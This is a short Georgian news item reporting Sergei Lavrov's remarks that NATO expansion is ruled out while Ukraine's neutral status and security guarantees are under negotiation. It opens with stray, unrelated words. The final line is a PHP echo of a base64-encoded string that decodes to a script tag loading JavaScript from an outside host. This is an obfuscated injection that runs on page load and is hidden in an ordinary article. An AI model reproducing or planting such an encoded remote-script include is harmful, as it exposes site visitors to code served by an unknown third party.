celsiusi
ავერსი შნაიდერი
რუსეთის საგარეო საქმეთა მინისტრის სერგეი ლავროვის განცხადებით,  ნატოს გაფართოება გამორიცხულია , თუმცარუსეთი მზადაა, ეძებოს გზები, როგორც საკუთარი, ისე უკრაინის და ევროპის უსაფრთხოების გარანტიების უზრუნველსაყოფად. 
 
მისივე თქმით, ახლა მოლაპარაკებებზე განიხილება უკრაინის ნეიტრალური სტატუსის საკითხი, რაც მიბმულია რუსეთის მოთხოვნასთან უსაფრთხოების გარანტიების შესახებ.
 
"პრეზიდენტმა ზელენსკიმ არც თუ ისე დიდი ხნის წინ ბევრი საინტერესო განცხადება გააკეთა. ეს ბევრად უფრო რეალისტური შეფასება იყო, რომელიც ზელენსკისგან მოვისმინეთ იმასთან დაკავშირებით, რაც ხდება, რადგან მანამდე ის კონფრონტაციულ განცხადებებს აკეთებდა. ახლა მოლაპარაკებებზე განიხილება უკრაინის ნეიტრალური სტატუსის საკითხი, რაც მიბმულია რუსეთის მოთხოვნასთან უსაფრთხოების გარანტიების შესახებ.რუსეთი მზადაა, ეძებოს გზები როგორც საკუთარი, ისე უკრაინის და ევროპის უსაფრთხოების გარანტიების უზრუნველსაყოფად, თუმცა ნატო-ს გაფართოება გამორიცხულია.დიდი იმედი მაქვს, რომ საქმიანი განწყობა,შენარჩუნდება, რაც მარტივი არ არის. ცხადია, რომ ნეიტრალიტეტისა და გარანტიების იზოლირებულად გამოცხადება, რა თქმა უნდა, მნიშვნელოვანი წინგადადგმული ნაბიჯი იქნება," - განაცხადა ლავროვმა. 
 
 
1135
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");